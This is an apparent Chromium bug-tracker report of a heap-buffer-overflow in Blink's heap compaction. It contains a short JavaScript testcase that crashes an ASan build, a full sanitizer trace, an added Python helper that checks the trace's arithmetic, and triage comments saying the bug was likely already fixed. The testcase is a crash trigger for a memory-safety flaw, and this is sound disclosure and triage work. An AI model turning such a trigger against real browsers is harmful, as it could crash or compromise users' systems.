Security: heap-buffer-overflow in blink::HeapCompact::MovableObjectFixups::Relocate
Reported by cloudfuz...@gmail.com, Aug 1
Issue description
VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of content_shell. It requires the --js-flags=--expose-gc command line flag.
VERSION
Chrome Version: asan-linux-release-579380
Operating System: Linux 64bit
REPRODUCTION CASE
<script>
function start () {
  o34 = document.createElementNS('http://www.w3.org/1999/xhtml', 'div');
  o34.innerHTML = '<svg><clipPath><ellipse><animate><circle><circle>';
  o35 = o34.firstChild.getElementsByTagName('*');
  o37 = o35[4];
  o202 = document.createElementNS('http://www.w3.org/2000/svg', 'feMergeNode');
  // Observer rooted on an SVG circle inside the detached <div> subtree.
  o266 = new IntersectionObserver(fun0, {root: o37, rootMargin: '524288px 1px -1441792px 11px'});
  gc();  // requires --js-flags=--expose-gc
  o266.observe(o202);
  window.setTimeout(fun0, 4);
}
function fun0() {
  // Drop the remaining references, force another collection and reload.
  o37 = null;
  o35 = null;
  o34 = null;
  gc();
  location.reload();
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
=================================================================
==24817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100017d108 at pc 0x000007dc1268 bp 0x7fff37afccf0 sp 0x7fff37afcce8
READ of size 8 at 0x62100017d108 thread T0 (content_shell)
#0 0x7dc1267 in blink::HeapCompact::MovableObjectFixups::Relocate(unsigned char*, unsigned char*) third_party/blink/renderer/platform/heap/heap_compact.cc:164:70
#1 0x7dcd2b5 in blink::NormalPage::SweepAndCompact(blink::NormalPage::CompactionContext&) third_party/blink/renderer/platform/heap/heap_page.cc:1472:16
#2 0x7dcc78a in blink::NormalPageArena::SweepAndCompact() third_party/blink/renderer/platform/heap/heap_page.cc:514:18
#3 0x7db1f74 in blink::ThreadHeap::Compact() third_party/blink/renderer/platform/heap/heap.cc:385:48
#4 0x7defe4d in blink::ThreadState::AtomicPauseEpilogue(blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType) third_party/blink/renderer/platform/heap/thread_state.cc:1006:12
#5 0x7df37f3 in blink::ThreadState::RunAtomicPause(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1594:5
#6 0x7de2f9c in blink::ThreadState::CollectGarbage(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1537:5
#7 0x7deef38 in CollectAllGarbage third_party/blink/renderer/platform/heap/thread_state.cc:1756:5
#8 0x7deef38 in blink::ThreadState::RunScheduledGC(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:929
#9 0x7df13a3 in blink::ThreadState::SafePoint(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:1234:3
#10 0x107fe822 in blink::GCTaskObserver::DidProcessTask() third_party/blink/renderer/platform/heap/gc_task_runner.h:63:29
#11 0xacf73b6 in base::sequence_manager::internal::SequenceManagerImpl::NotifyDidProcessTask(base::sequence_manager::internal::SequenceManagerImpl::ExecutingTask*, base::sequence_manager::LazyNow*) base/task/sequence_manager/sequence_manager_impl.cc:552:16
#12 0xacf6bb5 in base::sequence_manager::internal::SequenceManagerImpl::DidRunTask() base/task/sequence_manager/sequence_manager_impl.cc:414:3
#13 0xad17fa4 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) base/task/sequence_manager/thread_controller_impl.cc:174:16
#14 0xac31cac in Run base/callback.h:99:12
#15 0xac31cac in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#16 0xac2c284 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:432:46
#17 0xac2d73c in DeferOrRunPendingTask base/message_loop/message_loop.cc:443:5
#18 0xac2d73c in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:515
#19 0xac363cf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#20 0xaca442b in base::RunLoop::Run() base/run_loop.cc:102:14
#21 0x17c1319a in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:200:23
#22 0x83db7dd in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:554:14
#23 0x83dfaaa in content::ContentMainRunnerImpl::Run(bool) content/app/content_main_runner_impl.cc:951:10
#24 0xfb75a89 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:472:29
#25 0x5c3330e in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#26 0x355b3c7 in main content/shell/app/shell_main.cc:39:10
#27 0x7fd8f7dd02e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
0x62100017d108 is located 8 bytes to the right of 4096-byte region [0x62100017c100,0x62100017d100)
allocated by thread T0 (content_shell) here:
#0 0x352bd23 in __interceptor_malloc /b/swarming/w/ir/kitchen-workdir/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0xfc0b772 in PartitionAllocGenericFlags base/allocator/partition_allocator/partition_alloc.h:321:18
#2 0xfc0b772 in Alloc base/allocator/partition_allocator/partition_alloc.h:341
#3 0xfc0b772 in BufferMalloc third_party/blink/renderer/platform/wtf/allocator/partitions.h:97
#4 0xfc0b772 in WTF::PartitionAllocator::AllocateBacking(unsigned long, char const*) third_party/blink/renderer/platform/wtf/allocator/partition_allocator.cc:13
#5 0x7dc5a50 in AllocateZeroedHashTableBacking<WTF::KeyValuePair<void *, void **>, WTF::HashTable<void *, WTF::KeyValuePair<void *, void **>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void *>, WTF::HashTraits<void **> >, WTF::HashTraits<void *>, WTF::PartitionAllocator> > third_party/blink/renderer/platform/wtf/allocator/partition_allocator.h:81:20
#6 0x7dc5a50 in AllocateTable third_party/blink/renderer/platform/wtf/hash_table.h:1622
#7 0x7dc5a50 in Rehash third_party/blink/renderer/platform/wtf/hash_table.h:1843
#8 0x7dc5a50 in WTF::HashTable<void*, WTF::KeyValuePair<void*, void**>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::HashTraits<void*>, WTF::PartitionAllocator>::Expand(WTF::KeyValuePair<void*, void**>*) third_party/blink/renderer/platform/wtf/hash_table.h:1694
#9 0x7dc5622 in WTF::HashTableAddResult<WTF::HashTable<void*, WTF::KeyValuePair<void*, void**>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::HashTraits<void*>, WTF::PartitionAllocator>, WTF::KeyValuePair<void*, void**> > WTF::HashTable<void*, WTF::KeyValuePair<void*, void**>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::HashTraits<void*>, WTF::PartitionAllocator>::insert<WTF::HashMapTranslator<WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::PtrHash<void>, WTF::PartitionAllocator>, void*&, void**&>(void*&&&, void**&&&) third_party/blink/renderer/platform/wtf/hash_table.h:1351:13
#10 0x7dc18de in InlineAdd<void *&, void **&> third_party/blink/renderer/platform/wtf/hash_map.h:530:25
#11 0x7dc18de in insert<void *&, void **&> third_party/blink/renderer/platform/wtf/hash_map.h:588
#12 0x7dc18de in blink::HeapCompact::MovableObjectFixups::Add(void**) third_party/blink/renderer/platform/heap/heap_compact.cc:81
#13 0x7dc155e in blink::HeapCompact::StartThreadCompaction() third_party/blink/renderer/platform/heap/heap_compact.cc:430:16
#14 0x7db1f4b in blink::ThreadHeap::Compact() third_party/blink/renderer/platform/heap/heap.cc:382:17
#15 0x7defe4d in blink::ThreadState::AtomicPauseEpilogue(blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType) third_party/blink/renderer/platform/heap/thread_state.cc:1006:12
#16 0x7df37f3 in blink::ThreadState::RunAtomicPause(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1594:5
#17 0x7de2f9c in blink::ThreadState::CollectGarbage(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1537:5
#18 0x7deef38 in CollectAllGarbage third_party/blink/renderer/platform/heap/thread_state.cc:1756:5
#19 0x7deef38 in blink::ThreadState::RunScheduledGC(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:929
#20 0x7df13a3 in blink::ThreadState::SafePoint(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:1234:3
#21 0x107fe822 in blink::GCTaskObserver::DidProcessTask() third_party/blink/renderer/platform/heap/gc_task_runner.h:63:29
#22 0xacf73b6 in base::sequence_manager::internal::SequenceManagerImpl::NotifyDidProcessTask(base::sequence_manager::internal::SequenceManagerImpl::ExecutingTask*, base::sequence_manager::LazyNow*) base/task/sequence_manager/sequence_manager_impl.cc:552:16
#23 0xacf6bb5 in base::sequence_manager::internal::SequenceManagerImpl::DidRunTask() base/task/sequence_manager/sequence_manager_impl.cc:414:3
#24 0xad17fa4 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) base/task/sequence_manager/thread_controller_impl.cc:174:16
#25 0xac31cac in Run base/callback.h:99:12
#26 0xac31cac in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#27 0xac2c284 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:432:46
#28 0xac2d73c in DeferOrRunPendingTask base/message_loop/message_loop.cc:443:5
#29 0xac2d73c in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:515
#30 0xac363cf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#31 0xaca442b in base::RunLoop::Run() base/run_loop.cc:102:14
#32 0x17c1319a in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:200:23
#33 0x83db7dd in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:554:14
#34 0x83dfaaa in content::ContentMainRunnerImpl::Run(bool) content/app/content_main_runner_impl.cc:951:10
#35 0xfb75a89 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:472:29
#36 0x5c3330e in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#37 0x355b3c7 in main content/shell/app/shell_main.cc:39:10
#38 0x7fd8f7dd02e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/blink/renderer/platform/heap/heap_compact.cc:164:70 in blink::HeapCompact::MovableObjectFixups::Relocate(unsigned char*, unsigned char*)
Shadow bytes around the buggy address:
0x0c42800279d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c42800279e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c42800279f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4280027a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4280027a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4280027a20: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==24817==ABORTING
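The ASan report above states that the 8-byte read lands "8 bytes to the right" of a 4096-byte region and prints the shadow row around it. The following triage helper is an added example, not part of this issue, of ClusterFuzz or of Chromium: it parses the key lines of the report (the sample text is copied from the report above, with most frames omitted), recomputes the access position relative to the allocation, derives the shadow address with the default x86-64 ASan mapping (shadow = (addr >> 3) + 0x7fff8000, assumed here as the platform default rather than read from the report) and checks that the bracketed shadow byte in the "=>" row is the one for the faulting address.

```python
import re

# Lines copied from the ASan report in this issue (header, READ line, frame #0,
# region line and the "=>" shadow row only; the remaining frames are omitted).
ASAN_REPORT = """\
==24817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100017d108 at pc 0x000007dc1268 bp 0x7fff37afccf0 sp 0x7fff37afcce8
READ of size 8 at 0x62100017d108 thread T0 (content_shell)
#0 0x7dc1267 in blink::HeapCompact::MovableObjectFixups::Relocate(unsigned char*, unsigned char*) third_party/blink/renderer/platform/heap/heap_compact.cc:164:70
0x62100017d108 is located 8 bytes to the right of 4096-byte region [0x62100017c100,0x62100017d100)
=>0x0c4280027a20: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
"""

# Default ASan shadow mapping on x86-64 Linux (assumed platform): one shadow byte
# per 8 application bytes, as the legend in the report says.
SHADOW_SCALE = 3
SHADOW_OFFSET_X86_64 = 0x7FFF8000

# Subset of the legend printed at the end of every ASan report.
SHADOW_LEGEND = {
    0x00: "addressable",
    0xFA: "heap left redzone",
    0xFD: "freed heap region",
    0xF1: "stack left redzone",
    0xF9: "global redzone",
}

ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: (?P<bug>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<access>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+)", re.M)
FRAME0_RE = re.compile(r"^\s*#0 0x[0-9a-f]+ in (?P<func>[^\s(]+)", re.M)
REGION_RE = re.compile(
    r"is located (?P<dist>\d+) bytes to the (?P<side>left|right) of "
    r"(?P<rsize>\d+)-byte region \[(?P<start>0x[0-9a-f]+),(?P<end>0x[0-9a-f]+)\)")
SHADOW_ROW_RE = re.compile(r"^=>(?P<base>0x[0-9a-f]+):(?P<bytes>.*)$", re.M)


def shadow_address(addr: int) -> int:
    """Application address -> address of its shadow byte (x86-64 default mapping)."""
    return (addr >> SHADOW_SCALE) + SHADOW_OFFSET_X86_64


def parse_asan_report(text: str) -> dict:
    """Pull the triage-relevant fields out of an ASan heap-buffer-overflow report."""
    err, acc, reg, fr0 = (r.search(text) for r in (ERROR_RE, ACCESS_RE, REGION_RE, FRAME0_RE))
    if not (err and acc and reg):
        raise ValueError("not a recognised ASan heap-buffer-overflow report")
    return {
        "bug": err["bug"],
        "access": acc["access"],
        "size": int(acc["size"]),
        "addr": int(acc["addr"], 16),
        "region_start": int(reg["start"], 16),
        "region_end": int(reg["end"], 16),
        "region_size": int(reg["rsize"]),
        "reported_side": reg["side"],
        "reported_distance": int(reg["dist"]),
        "frame0": fr0["func"] if fr0 else None,
    }


def classify_access(info: dict) -> tuple:
    """Recompute where the faulting address lies relative to the allocation.

    Returns (side, distance_in_bytes); "right" means past the end of the region.
    """
    addr, start, end = info["addr"], info["region_start"], info["region_end"]
    if addr < start:
        return ("left", start - addr)
    if addr >= end:
        return ("right", addr - end)
    return ("inside", addr - start)


def shadow_byte_for(text: str, addr: int) -> tuple:
    """Look the address up in the "=>" shadow row; returns (value, legend, is_marked).

    is_marked is True when ASan bracketed that byte, i.e. it is the one it flagged.
    """
    row = SHADOW_ROW_RE.search(text)
    if row is None:
        raise ValueError("no '=>' shadow row in report")
    base = int(row["base"], 16)
    # The bracketed byte breaks the space separation ("fa[fa]fa"), so match pairs directly.
    cells = re.findall(r"(\[)?([0-9a-f]{2})\]?", row["bytes"])
    index = shadow_address(addr) - base
    if not 0 <= index < len(cells):
        raise ValueError("address not covered by the printed shadow row")
    marked, value = cells[index]
    value = int(value, 16)
    return (value, SHADOW_LEGEND.get(value, "other"), marked == "[")


def triage(text: str) -> dict:
    """Summary a sheriff wants before opening the source location in frame #0."""
    info = parse_asan_report(text)
    side, dist = classify_access(info)
    value, meaning, marked = shadow_byte_for(text, info["addr"])
    consistent = ((side, dist) == (info["reported_side"], info["reported_distance"])
                  and info["region_end"] - info["region_start"] == info["region_size"])
    return {**info, "computed_side": side, "computed_distance": dist, "consistent": consistent,
            "shadow": hex(shadow_address(info["addr"])), "shadow_byte": value,
            "shadow_meaning": meaning, "shadow_marked": marked}


if __name__ == "__main__":
    for key, value in triage(ASAN_REPORT).items():
        print(f"{key}: {value}")
```

For this report the helper confirms the arithmetic: the faulting address is exactly 8 bytes past the end of the 4096-byte hash-table backing store (a pointer-sized read one slot beyond the last valid one), its shadow byte sits at 0x0c4280027a21, which is the bracketed byte in the "=>" row, and that byte is 0xfa. ASan uses the single value 0xfa for the redzones on both sides of a heap block, so the legend's "heap left redzone" label is the name of the code, not a statement about which side was hit.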
Aug 1
Testcase 5137962954915840 failed to reproduce the crash. Please inspect the program output at https://clusterfuzz.com/testcase?key=5137962954915840.

Aug 2
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6601307335688192.

Aug 2
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6534855601684480.

Aug 2
Testcase 6534855601684480 failed to reproduce the crash. Please inspect the program output at https://clusterfuzz.com/testcase?key=6534855601684480.

Aug 2
Thanks for your report. I can reproduce the crash on the revision you've mentioned, but not on the most recent one, e.g. https://storage.cloud.google.com/chromium-browser-asan/linux-release/asan-linux-release-580151.zip. Likely it's already been fixed as issue 869301.

Nov 8
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by ClusterFuzz, Aug 1